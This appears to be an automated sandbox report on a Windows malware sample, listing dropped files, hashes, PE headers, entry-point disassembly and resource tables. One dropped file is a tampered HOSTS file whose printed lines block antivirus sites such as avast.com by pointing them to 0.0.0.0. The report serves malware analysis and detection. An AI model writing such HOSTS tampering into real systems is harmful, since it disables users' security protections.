                                                                                              Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):13340
                                                                                              Entropy (8bit):2.6858485747857173
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:TiZYWhxHfhZyYxY3WdHLfYEZZatHiZIKKW6w44BXMaf+P5Mi4tmFI9t3:2ZDy2DPGHafm5Miqma9t3
                                                                                              MD5:F1CBB4476406CAC5031B02B2A9FBBC27
                                                                                              SHA1:7F28723A365533A554EEE645C5DF2FFA5F4F1492
                                                                                              SHA-256:F94A8E0BC434A2B0C58F5EFA5EA7D8C449717273FEE2E780132AF0731BE628E7
                                                                                              SHA-512:7172FBFA413BA7BBD44C4CEEB39500DEDEF301A43F029936BA6825793B9D3CE2FAC77B448D57B3CD11C2C061DCAA06803633E40A15E1BB4B5BFC6257A6177FC6
                                                                                              Malicious:false
                                                                                              Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                              Process:C:\Users\user\Desktop\b4s45TboUL.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):692736
                                                                                              Entropy (8bit):6.304379785339226
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:Kk5nGNLFzxC+gej5yNcTN+pt+tLK75PL2rn65hYVKKuKOvy/j3t:KMGNL/geFyNcTN+jv75TQn652VBuNyb
                                                                                              MD5:EDA18948A989176F4EEBB175CE806255
                                                                                              SHA1:FF22A3D5F5FB705137F233C36622C79EAB995897
                                                                                              SHA-256:81A4F37C5495800B7CC46AEA6535D9180DADB5C151DB6F1FD1968D1CD8C1EEB4
                                                                                              SHA-512:160ED9990C37A4753FC0F5111C94414568654AFBEDC05308308197DF2A99594F2D5D8FE511FD2279543A869ED20248E603D88A0B9B8FB119E8E6131B0C52FF85
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Joe Sandbox View:
                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                              • Filename: 0T32Kz4dZU.exe, Detection: malicious, Browse
                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                              • Filename: tdnPqG0jmS.exe, Detection: malicious, Browse
                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s,.>7M.m7M.m7M.m|5.l<M.m|5.l.M.m|5.l#M.m'..l"M.m'..l'M.m'..l.M.m|5.l:M.m7M.m.M.m7M.mlM.m...l6M.m...l6M.mRich7M.m........................PE..L......g.........."!...)............P.....................................................@..........................\..l...<].................................. 8...(..T....................(......@'..@............................................text............................... ..`.rdata..zV.......X..................@..@.data...T....p.......N..............@....reloc.. 8.......:...X..............@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\Desktop\b4s45TboUL.exe
                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):8662936
                                                                                              Entropy (8bit):7.927707184368659
                                                                                              Encrypted:false
                                                                                              SSDEEP:196608:weeq5JeITAZfUnRGPG+FyWlaYVNcT5qagonrxz/4fBiCY1MFU:u4J48svIiuT5PvQfBi3eFU
                                                                                              MD5:0F247FC98A73243773ED3614FFAD3118
                                                                                              SHA1:1BB4ECA56217F784738CB9108F18BF4C6B67F67E
                                                                                              SHA-256:0CF1E07D9FF27240D711390121E4EA7EB6F84E3C150AE9BB6D860E2819AD61E5
                                                                                              SHA-512:50414ED73F76AA6280AFF26D1AA7BFD99F49E6D6C8CD9470692674C1414DD9248CBD602028FC62335BC050179807B8290A27924DBD7D87BE620153BB9B56081A
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 47%
                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....!g.........."...........l.....X..........@....................................zz....`.................................................B0n.d....Pn.H...................................................(@n.(................................................... &........o.................. ..` .*... ..<....t..............@..@ .l..P....Q.................@... ......m.......R.............@..@ ......m.......R.............@..@ ......n.......R.............@... P.....n.n.....R.............@..@ x.... n.i.....R.............@..B.imports.....0n.......R.............@....tls.........@n.......R..................rsrc........Pn...... R.............@..@.themida..W..`n......$R.............`....boot.....1.......1..$R.............`..`.reloc................................@........................................................
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):64
                                                                                              Entropy (8bit):1.1510207563435464
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Nlllullkv/tz:NllU+v/
                                                                                              MD5:6442F277E58B3984BA5EEE0C15C0C6AD
                                                                                              SHA1:5343ADC2E7F102EC8FB6A101508730898CB14F57
                                                                                              SHA-256:36B765624FCA82C57E4C5D3706FBD81B5419F18FC3DD7B77CD185E6E3483382D
                                                                                              SHA-512:F9E62F510D5FB788F40EBA13287C282444607D2E0033D2233BC6C39CA3E1F5903B65A07F85FA0942BEDDCE2458861073772ACA06F291FA68F23C765B0CA5CA17
                                                                                              Malicious:false
                                                                                              Preview:@...e................................................@..........
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                              Process:C:\ProgramData\HIIDGCGCBF.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):2748
                                                                                              Entropy (8bit):4.269302338623222
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:vDZhyoZWM9rU5fFcDL6iCW1RiJ9rn5w0K:vDZEurK9XiCW1RiXn54
                                                                                              MD5:7B1D6A1E1228728A16B66C3714AA9A23
                                                                                              SHA1:8B59677A3560777593B1FA7D67465BBD7B3BC548
                                                                                              SHA-256:3F15965D0159A818849134B3FBB016E858AC50EFDF67BFCD762606AC51831BC5
                                                                                              SHA-512:573B68C9865416EA2F9CF5C614FCEDBFE69C67BD572BACEC81C1756E711BD90FCFEE93E17B74FB294756ADF67AD18845A56C87F7F870940CBAEB3A579146A3B6
                                                                                              Malicious:true
                                                                                              Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....0.0.0.0 avast.com..0.0.0.0 www.avast.com..0.0.0.0 totalav.com..0.0.0.0 www.totalav.com..0.0.0.0 scanguard.com..0.0.0.0 www.scanguard.com..
                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                              File Type:MS Windows registry file, NT/2000 or above
                                                                                              Category:dropped
                                                                                              Size (bytes):1835008
                                                                                              Entropy (8bit):4.465440250634685
                                                                                              Encrypted:false
                                                                                              SSDEEP:6144:IIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uN/dwBCswSbU:dXD94+WlLZMM6YFH1+U
                                                                                              MD5:9DC531EB64DE55E849B7F56FA3D87AAB
                                                                                              SHA1:47B4B3A19C5CAB127CC7A5C0182EACB446EDA283
                                                                                              SHA-256:0CC7A482DB11B444D823B88929D04FCC8C05945445624E77A69CCA87C47CDD02
                                                                                              SHA-512:EC8CBA4E1AC4FD2F68C42744FCFFBA05288E989ACFF67DE90053E3A0EFBEE398044D33F084C4049B04E7DBCF2B1CDEF59CF8DE53B399C84867E5F644AAD5E220
                                                                                              Malicious:false
                                                                                              Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...'.*...............................................................................................................................................................................................................................................................................................................................................k..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Entropy (8bit):7.269274960247297
                                                                                              TrID:
                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                              File name:b4s45TboUL.exe
                                                                                              File size:712'192 bytes
                                                                                              MD5:b6f6e51f0efa952f3ffcaab9dd5895db
                                                                                              SHA1:dadb11d90adb38dc798acae755004ed8e93b088f
                                                                                              SHA256:7bfc486e94aacc90fac1037845f79f92f04a0db6fbbab9eaa45c4afe7d0a21fe
                                                                                              SHA512:42f87f1ed44075552d20d96cfec11ff7627d6bd06ef9a3328853cc1fa8375290abc10c692d8059f1516b202b3b8cdadaf84933587e838a229c1d9e0b7fa3ed61
                                                                                              SSDEEP:12288:r9p/R7g6IMdSZCNSSumwQypEun3a8N7yCqrT8O8EntuY9w+f4sij/I+7Nj:r9bqcJNHuNQypEun3aVCqrI6P9w+4jZj
                                                                                              TLSH:DEE412007591E871C95256709828C6F41B3FBCB29E6479AF3B697FBF3970381A6B2311
                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<.8.]yk.]yk.]yk...k.]yk...k.]yk...k.]yk...k.]yk.]xk.]yk...k.]yk...k.]yk...k.]ykRich.]yk................PE..L....Hoe...........
                                                                                              Icon Hash:63796de961436e0f
                                                                                              Entrypoint:0x405d0b
                                                                                              Entrypoint Section:.text
                                                                                              Digitally signed:false
                                                                                              Imagebase:0x400000
                                                                                              Subsystem:windows gui
                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                              DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                              Time Stamp:0x656F48D4 [Tue Dec 5 15:59:16 2023 UTC]
                                                                                              TLS Callbacks:
                                                                                              CLR (.Net) Version:
                                                                                              OS Version Major:5
                                                                                              OS Version Minor:0
                                                                                              File Version Major:5
                                                                                              File Version Minor:0
                                                                                              Subsystem Version Major:5
                                                                                              Subsystem Version Minor:0
                                                                                              Import Hash:9972752d76c4469a480fbf42fd02d1a2
                                                                                              Instruction
                                                                                              call 00007FC60C4D204Fh
                                                                                              jmp 00007FC60C4CDFDEh
                                                                                              mov edi, edi
                                                                                              push ebp
                                                                                              mov ebp, esp
                                                                                              push edi
                                                                                              mov edi, 000003E8h
                                                                                              push edi
                                                                                              call dword ptr [004010D0h]
                                                                                              push dword ptr [ebp+08h]
                                                                                              call dword ptr [004010CCh]
                                                                                              add edi, 000003E8h
                                                                                              cmp edi, 0000EA60h
                                                                                              jnbe 00007FC60C4CE166h
                                                                                              test eax, eax
                                                                                              je 00007FC60C4CE140h
                                                                                              pop edi
                                                                                              pop ebp
                                                                                              ret
                                                                                              mov edi, edi
                                                                                              push ebp
                                                                                              mov ebp, esp
                                                                                              call 00007FC60C4CE89Dh
                                                                                              push dword ptr [ebp+08h]
                                                                                              call 00007FC60C4CE6EAh
                                                                                              push dword ptr [0049302Ch]
                                                                                              call 00007FC60C4D1ADBh
                                                                                              push 000000FFh
                                                                                              call eax
                                                                                              add esp, 0Ch
                                                                                              pop ebp
                                                                                              ret
                                                                                              mov edi, edi
                                                                                              push ebp
                                                                                              mov ebp, esp
                                                                                              push 00401210h
                                                                                              call dword ptr [004010CCh]
                                                                                              test eax, eax
                                                                                              je 00007FC60C4CE177h
                                                                                              push 00401200h
                                                                                              push eax
                                                                                              call dword ptr [0040107Ch]
                                                                                              test eax, eax
                                                                                              je 00007FC60C4CE167h
                                                                                              push dword ptr [ebp+08h]
                                                                                              call eax
                                                                                              pop ebp
                                                                                              ret
                                                                                              mov edi, edi
                                                                                              push ebp
                                                                                              mov ebp, esp
                                                                                              push dword ptr [ebp+08h]
                                                                                              call 00007FC60C4CE12Dh
                                                                                              pop ecx
                                                                                              push dword ptr [ebp+08h]
                                                                                              call dword ptr [004010D4h]
                                                                                              int3
                                                                                              push 00000008h
                                                                                              call 00007FC60C4D0011h
                                                                                              pop ecx
                                                                                              ret
                                                                                              push 00000008h
                                                                                              call 00007FC60C4CFF2Eh
                                                                                              pop ecx
                                                                                              ret
                                                                                              mov edi, edi
                                                                                              push ebp
                                                                                              mov ebp, esp
                                                                                              push esi
                                                                                              mov esi, eax
                                                                                              jmp 00007FC60C4CE16Dh
                                                                                              mov eax, dword ptr [esi]
                                                                                              test eax, eax
                                                                                              je 00007FC60C4CE164h
                                                                                              Programming Language:
                                                                                              • [C++] VS2008 build 21022
                                                                                              • [ASM] VS2008 build 21022
                                                                                              • [ C ] VS2008 build 21022
                                                                                              • [IMP] VS2005 build 50727
                                                                                              • [RES] VS2008 build 21022
                                                                                              • [LNK] VS2008 build 21022
                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x91d740x64.text
                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x9e0000x149a8.rsrc
                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x2eb0000x9c8.reloc
                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x47d80x40.text
                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x10000x188.text
                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                              .text0x10000x9167a0x91800a07a53c78d7c602f413c9f13389d646bFalse0.8691070661512027DIY-Thermocam raw data (Lepton 2.x), scale -30395--27360, spot sensor temperature 0.160650, unit celsius, color scheme 0, calibration: offset 0.000000, slope 0.1679697.619569999320736IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                              .data0x930000x98000x5c002d02ef982afb7cc6abac76ef99525603False0.07842221467391304data0.9100911859533071IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                              .tehu0x9d0000x4000x4000f343b0931126a20f133d67c2b018a3bFalse0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                              .rsrc0x9e0000x24c9a80x14a004aa9e78bf29053432f1e679ebb6c88f0unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                              .reloc0x2eb0000x161e0x1800c28550a2a27c41aa7efd2ac700f64c98False0.3567708333333333data3.5521617801275434IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                              RELUZUZIJEREB0xa9f380x1e31ASCII text, with very long lines (7729), with no line terminatorsTamilIndia0.5880450252296545
                                                                                              RELUZUZIJEREB0xa9f380x1e31ASCII text, with very long lines (7729), with no line terminatorsTamilSri Lanka0.5880450252296545
                                                                                              RIXIZUTOK0xa81e00x9e7ASCII text, with very long lines (2535), with no line terminatorsTamilIndia0.6047337278106509
                                                                                              RIXIZUTOK0xa81e00x9e7ASCII text, with very long lines (2535), with no line terminatorsTamilSri Lanka0.6047337278106509
                                                                                              WIPOPABIZOVOZAVOBIMOZOZ0xa8bc80x136fASCII text, with very long lines (4975), with no line terminatorsTamilIndia0.5911557788944724
                                                                                              WIPOPABIZOVOZAVOBIMOZOZ0xa8bc80x136fASCII text, with very long lines (4975), with no line terminatorsTamilSri Lanka0.5911557788944724
                                                                                              RT_CURSOR0xabdc80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.2953091684434968
                                                                                              RT_CURSOR0xacc700x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.46705776173285196
                                                                                              RT_CURSOR0xad5180x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5361271676300579
                                                                                              RT_CURSOR0xadab00x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.4375
                                                                                              RT_CURSOR0xadbe00xb0Device independent bitmap graphic, 16 x 32 x 1, image size 00.44886363636363635
                                                                                              RT_CURSOR0xadcb80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.27238805970149255
                                                                                              RT_CURSOR0xaeb600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.375
                                                                                              RT_CURSOR0xaf4080x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5057803468208093
                                                                                              RT_CURSOR0xaf9a00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.30943496801705755
                                                                                              RT_CURSOR0xb08480x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.427797833935018
                                                                                              RT_CURSOR0xb10f00x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5469653179190751
                                                                                              RT_ICON0x9e8a00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilIndia0.5357142857142857
                                                                                              RT_ICON0x9e8a00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilSri Lanka0.5357142857142857
                                                                                              RT_ICON0x9ef680x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.41161825726141077
                                                                                              RT_ICON0x9ef680x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.41161825726141077
                                                                                              RT_ICON0xa15100x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.44592198581560283
                                                                                              RT_ICON0xa15100x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.44592198581560283
                                                                                              RT_ICON0xa19a80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilIndia0.36220682302771856
                                                                                              RT_ICON0xa19a80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilSri Lanka0.36220682302771856
                                                                                              RT_ICON0xa28500x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilIndia0.49864620938628157
                                                                                              RT_ICON0xa28500x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilSri Lanka0.49864620938628157
                                                                                              RT_ICON0xa30f80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilIndia0.5673963133640553
                                                                                              RT_ICON0xa30f80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilSri Lanka0.5673963133640553
                                                                                              RT_ICON0xa37c00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilIndia0.6242774566473989
                                                                                              RT_ICON0xa37c00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilSri Lanka0.6242774566473989
                                                                                              RT_ICON0xa3d280x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TamilIndia0.43132780082987554
                                                                                              RT_ICON0xa3d280x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TamilSri Lanka0.43132780082987554
                                                                                              RT_ICON0xa62d00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TamilIndia0.44183864915572235
                                                                                              RT_ICON0xa62d00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TamilSri Lanka0.44183864915572235
                                                                                              RT_ICON0xa73780x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TamilIndia0.4323770491803279
                                                                                              RT_ICON0xa73780x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TamilSri Lanka0.4323770491803279
                                                                                              RT_ICON0xa7d000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TamilIndia0.48404255319148937
                                                                                              RT_ICON0xa7d000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TamilSri Lanka0.48404255319148937
                                                                                              RT_DIALOG0xb18d80x58data0.8977272727272727
                                                                                              RT_STRING0xb19300x3fadataTamilIndia0.4489194499017682
                                                                                              RT_STRING0xb19300x3fadataTamilSri Lanka0.4489194499017682
                                                                                              RT_STRING0xb1d300x318dataTamilIndia0.48863636363636365
                                                                                              RT_STRING0xb1d300x318dataTamilSri Lanka0.48863636363636365
                                                                                              RT_STRING0xb20480x5c2dataTamilIndia0.4314789687924016
                                                                                              RT_STRING0xb20480x5c2dataTamilSri Lanka0.4314789687924016
                                                                                              RT_STRING0xb26100x396dataTamilIndia0.45098039215686275
                                                                                              RT_STRING0xb26100x396dataTamilSri Lanka0.45098039215686275
                                                                                              RT_ACCELERATOR0xabd700x58dataTamilIndia0.7954545454545454
                                                                                              RT_ACCELERATOR0xabd700x58dataTamilSri Lanka0.7954545454545454
                                                                                              RT_GROUP_CURSOR0xada800x30data0.9375
                                                                                              RT_GROUP_CURSOR0xadc900x22data1.0588235294117647
                                                                                              RT_GROUP_CURSOR0xaf9700x30data0.9375
                                                                                              RT_GROUP_CURSOR0xb16580x30data0.9375
                                                                                              RT_GROUP_ICON0xa19780x30dataTamilIndia0.9375
                                                                                              RT_GROUP_ICON0xa19780x30dataTamilSri Lanka0.9375
                                                                                              RT_GROUP_ICON0xa81680x76dataTamilIndia0.6694915254237288
                                                                                              RT_GROUP_ICON0xa81680x76dataTamilSri Lanka0.6694915254237288
                                                                                              RT_VERSION0xb16880x250data0.535472972972973
                                                                                              DLLImport
